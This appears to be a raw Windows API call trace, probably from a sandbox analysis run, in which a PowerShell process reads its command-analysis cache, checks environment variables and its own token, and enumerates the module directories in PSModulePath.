	[0058.449] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x184c18da90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x4d
	[0058.449] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18ded0) returned 1
	[0058.449] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfb0 | out: lpFileInformation=0x184c18dfb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95cbb7af, ftCreationTime.dwHighDateTime=0x1d31d93, ftLastAccessTime.dwLowDateTime=0xc171bbc1, ftLastAccessTime.dwHighDateTime=0x1d31d93, ftLastWriteTime.dwLowDateTime=0xc171bbc1, ftLastWriteTime.dwHighDateTime=0x1d31d93, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1
	[0058.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18de90) returned 1
	[0058.449] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_41c67784-5a05-4d3a-a346-47e4d3e9d32f", nBufferLength=0x105, lpBuffer=0x184c18d930, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_41c67784-5a05-4d3a-a346-47e4d3e9d32f", lpFilePart=0x0) returned 0x8f
	[0058.449] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18de10) returned 1
	[0058.449] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_41c67784-5a05-4d3a-a346-47e4d3e9d32f" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_41c67784-5a05-4d3a-a346-47e4d3e9d32f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x8cc
	[0058.449] GetFileType (hFile=0x8cc) returned 0x1
	[0058.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd80) returned 1
	[0058.450] GetFileType (hFile=0x8cc) returned 0x1
	[0058.450] ReadFile (in: hFile=0x8cc, lpBuffer=0x15047e6e908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18dc78, lpOverlapped=0x0 | out: lpBuffer=0x15047e6e908*, lpNumberOfBytesRead=0x184c18dc78*=0x717, lpOverlapped=0x0) returned 1
	[0058.450] ReadFile (in: hFile=0x8cc, lpBuffer=0x15047e6e908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18dc48, lpOverlapped=0x0 | out: lpBuffer=0x15047e6e908*, lpNumberOfBytesRead=0x184c18dc48*=0x0, lpOverlapped=0x0) returned 1
	[0058.450] CloseHandle (hObject=0x8cc) returned 1
	[0058.450] ReleaseMutex (hMutex=0x8c8) returned 1
	[0058.450] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x105, lpBuffer=0x184c18dcd0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", lpFilePart=0x0) returned 0x77
	[0058.450] CoTaskMemAlloc (cb=0x218) returned 0x1505fbd7f10
	[0058.450] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1505fbd7f10, nSize=0x10a | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0058.451] CoTaskMemFree (pv=0x1505fbd7f10) 
	[0058.451] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbdd630
	[0058.451] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1505fbdd630 | out: pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0058.451] CoTaskMemFree (pv=0x1505fbdd630) 
	[0058.451] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local", lpFilePart=0x0) returned 0x1f
	[0058.451] GetCurrentProcess () returned 0xffffffffffffffff
	[0058.451] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184c18def8 | out: TokenHandle=0x184c18def8*=0x8cc) returned 1
	[0058.451] GetTokenInformation (in: TokenHandle=0x8cc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x184c18dff8 | out: TokenInformation=0x0, ReturnLength=0x184c18dff8) returned 0
	[0058.451] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1505fc9aaa0
	[0058.451] GetTokenInformation (in: TokenHandle=0x8cc, TokenInformationClass=0x1, TokenInformation=0x1505fc9aaa0, TokenInformationLength=0x2c, ReturnLength=0x184c18dff8 | out: TokenInformation=0x1505fc9aaa0, ReturnLength=0x184c18dff8) returned 1
	[0058.451] LocalFree (hMem=0x1505fc9aaa0) returned 0x0
	[0058.451] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x15047e738d0, cbSid=0x184c18dff0 | out: pSid=0x15047e738d0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x184c18dff0) returned 1
	[0058.451] CreateMutexW (lpMutexAttributes=0x15047e73a20, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000") returned 0x8d0
	[0058.451] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x184c18de90*=0x8d0, lpdwindex=0x184c18dc64 | out: lpdwindex=0x184c18dc64) returned 0x0
	[0058.451] CoTaskMemAlloc (cb=0x218) returned 0x1505fbd7f10
	[0058.451] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1505fbd7f10, nSize=0x10a | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0058.451] CoTaskMemFree (pv=0x1505fbd7f10) 
	[0058.452] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x105, lpBuffer=0x184c18db60, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", lpFilePart=0x0) returned 0x77
	[0058.452] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfe0) returned 1
	[0058.452] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautils.psd1"), fInfoLevelId=0x0, lpFileInformation=0x15047e740d0 | out: lpFileInformation=0x15047e740d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6194)) returned 1
	[0058.452] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfa0) returned 1
	[0058.452] ReleaseMutex (hMutex=0x8d0) returned 1
	[0058.452] CoCreateGuid (in: pguid=0x184c18e008 | out: pguid=0x184c18e008*(Data1=0x5375bf9a, Data2=0x9bc2, Data3=0x4665, Data4=([0]=0x95, [1]=0x29, [2]=0x86, [3]=0x10, [4]=0xa9, [5]=0x6a, [6]=0x7e, [7]=0x8a))) returned 0x0
	[0058.452] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8d4
	[0058.452] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x8d8
	[0058.452] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8dc
	[0058.452] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8e0
	[0058.452] SetEvent (hEvent=0x8e0) returned 1
	[0058.452] SetEvent (hEvent=0x8d4) returned 1
	[0058.452] SetEvent (hEvent=0x8d8) returned 1
	[0058.452] SetEvent (hEvent=0x8dc) returned 1
	[0058.452] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8e4
	[0058.452] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0058.457] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x184c18db68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18db68*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x62, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0058.457] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18da70*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18da70*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x60, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0058.457] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x184c18db48*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x62, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1)) | out: ActivityId=0x184c18db48*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x62, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0058.458] CoTaskMemAlloc (cb=0x218) returned 0x1505fbdd850
	[0058.458] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1505fbdd850, nSize=0x10a | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x93
	[0058.458] CoTaskMemFree (pv=0x1505fbdd850) 
	[0058.458] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x184c18d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x35
	[0058.458] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d600) returned 1
	[0058.458] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\nd9e1fyi\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18d6e0 | out: lpFileInformation=0x184c18d6e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0058.458] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d5c0) returned 1
	[0058.461] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x184c18d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a
	[0058.461] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d600) returned 1
	[0058.461] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18d6e0 | out: lpFileInformation=0x184c18d6e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0058.461] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d5c0) returned 1
	[0058.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x184c18d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32
	[0058.461] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d600) returned 1
	[0058.461] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18d6e0 | out: lpFileInformation=0x184c18d6e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1
	[0058.462] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d5c0) returned 1
	[0058.462] CoTaskMemAlloc (cb=0x218) returned 0x1505fbdb430
	[0058.462] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1505fbdb430, nSize=0x10a | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x93
	[0058.462] CoTaskMemFree (pv=0x1505fbdb430) 
	[0058.462] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x184c18d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x35
	[0058.462] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d600) returned 1
	[0058.462] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\nd9e1fyi\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18d6e0 | out: lpFileInformation=0x184c18d6e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0058.462] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d5c0) returned 1
	[0058.464] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x184c18d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a
	[0058.464] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d600) returned 1
	[0058.464] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18d6e0 | out: lpFileInformation=0x184c18d6e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0058.464] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d5c0) returned 1
	[0058.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x184c18d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32
	[0058.464] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d600) returned 1
	[0058.464] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18d6e0 | out: lpFileInformation=0x184c18d6e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1
	[0058.465] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d5c0) returned 1
	[0058.465] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d4f0) returned 1
	[0058.465] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x184c18cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a
	[0058.465] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\", nBufferLength=0x105, lpBuffer=0x184c18cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\", lpFilePart=0x0) returned 0x2b
	[0058.466] FindClose (in: hFindFile=0x1505fc88bb0 | out: hFindFile=0x1505fc88bb0) returned 1
	[0058.466] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d440) returned 1
	[0058.466] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d400) returned 1
	[0058.466] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d4f0) returned 1
	[0058.466] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x184c18cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a
	[0058.466] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\", nBufferLength=0x105, lpBuffer=0x184c18cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\", lpFilePart=0x0) returned 0x2b
	[0058.467] FindClose (in: hFindFile=0x1505fc884f0 | out: hFindFile=0x1505fc884f0) returned 1
	[0058.467] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d440) returned 1
	[0058.467] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d400) returned 1
	[0058.467] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.467] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c
	[0058.467] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\", nBufferLength=0x105, lpBuffer=0x184c18cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\", lpFilePart=0x0) returned 0x3d
	[0058.468] FindClose (in: hFindFile=0x1505fc87950 | out: hFindFile=0x1505fc87950) returned 1
	[0058.468] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.468] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.468] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.468] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c
	[0058.468] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\", nBufferLength=0x105, lpBuffer=0x184c18cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\", lpFilePart=0x0) returned 0x3d
	[0058.468] FindClose (in: hFindFile=0x1505fc87950 | out: hFindFile=0x1505fc87950) returned 1
	[0058.468] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.468] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.469] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d1d0) returned 1
	[0058.469] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x184c18ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44
	[0058.469] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\", nBufferLength=0x105, lpBuffer=0x184c18cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\", lpFilePart=0x0) returned 0x45
	[0058.469] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*", lpFindFileData=0x184c18ce70 | out: lpFindFileData=0x184c18ce70) returned 0x1505fc884f0
	[0058.469] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.469] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.469] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.469] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.469] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.470] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.470] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.470] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.470] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.470] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.470] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.470] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.470] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 0
	[0058.470] FindClose (in: hFindFile=0x1505fc884f0 | out: hFindFile=0x1505fc884f0) returned 1
	[0058.471] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d120) returned 1
	[0058.471] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d0e0) returned 1
	[0058.471] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d1d0) returned 1
	[0058.471] FindNextFileW (in: hFindFile=0x1505fc88af0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.471] FindNextFileW (in: hFindFile=0x1505fc88af0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.471] FindNextFileW (in: hFindFile=0x1505fc88af0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.471] FindNextFileW (in: hFindFile=0x1505fc88af0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.471] FindNextFileW (in: hFindFile=0x1505fc88af0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.472] FindNextFileW (in: hFindFile=0x1505fc88af0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.472] FindNextFileW (in: hFindFile=0x1505fc88af0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.472] FindNextFileW (in: hFindFile=0x1505fc88af0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.472] FindNextFileW (in: hFindFile=0x1505fc88af0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.472] FindNextFileW (in: hFindFile=0x1505fc88af0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.472] FindNextFileW (in: hFindFile=0x1505fc88af0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.472] FindNextFileW (in: hFindFile=0x1505fc88af0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.472] FindNextFileW (in: hFindFile=0x1505fc88af0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 0
	[0058.473] FindClose (in: hFindFile=0x1505fc88af0 | out: hFindFile=0x1505fc88af0) returned 1
	[0058.473] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d120) returned 1
	[0058.473] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d0e0) returned 1
	[0058.473] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d200) returned 1
	[0058.473] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1c0) returned 1
